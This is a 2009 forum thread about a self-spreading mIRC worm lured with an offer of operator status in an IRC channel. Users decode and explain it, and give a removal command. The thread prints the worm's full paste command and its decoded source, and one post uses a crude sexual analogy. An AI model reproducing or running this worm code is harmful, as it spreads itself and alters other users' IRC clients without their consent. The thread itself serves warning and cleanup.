Scam in #tf.wars?
Created 6th May 2009 @ 17:30
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Just got this query on irc:
Do You Want to be an OPERATOR in #tf.wars ? copy/paste this->14 //write $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgL
AkKyBtZSArUiB9,m) | .load -rs | //mode $me +R
Have no idea what it does, just sounds suspicious.
Yeah its an irc worm dont type that in whatever you do :p, could load a trojan on your pc or it could just make you spam other people to join a channel, either way its a norty worm.
That’s what the $decode thing does:
“on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join | .msg $nick Do You Want to be an OPERATOR in $chan ? copy/paste this->14 //write $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs $chr(124) //mode $ $+ me +R }”
I don’t have any knowledge with mirc scripts, so I got no idea of what does that do. It seems to be pasting the same message to everybody?
I decoded it with this
Basically this script will make you join a certain Chan every 2 min, and it adds anyone who uses the letter “a” or “A” to your Ignore list.
This means you wont see what they type. It sends them the script as well
Also it makes you +R, meaning that you wont get any pm’s from ppl who arn’t authed with Q.
yeah its a virus i had it for a bit, turns out if you just copy the title it still gives you a virus :S
So yeah reinstall IRC and virus scan
On a serious note, dont be checking your bank sites etc ;)
Dunno if itll keylog to but not worth the risk tbh so just reinstall IRC (FULLY, as in delete the whole directory after removing it)
And on another serious note dont copy/paste links from strangers you retards! :p
Liken it to a stranger coming up to you in the street and them asking you somthing in polish, then you saying “oh ok” and then realising as hes forcing your head down on his exposed crabs ridden penis what he means.
If you add to your perform “/mode +X” & “/mode +r” I can double check this when I get home.
This will stop all messages from un-authed users, stops a lot of rubbish like that. If I remember right +X is hide part of your IP address, +R is ignore messages from non authed users.
//unload -rs $chr(160) | remove $chr(160) | mode $me -R | timers off
Then go into your address book (ALT+B), go onto the Control tab, select Ignore from the dropdown menu, and delete all the people in the list.
Should clear it without having to reinstall. Don’t be alarmed though guys it doesn’t do much other than spam itself with little benefit other than creating more spam.. bit of a fail worm.
edit: If you are using a script other than a vanilla mIRC, restart it as the timers have been turned off. ** make sure you use the double slash (//) on the command above **
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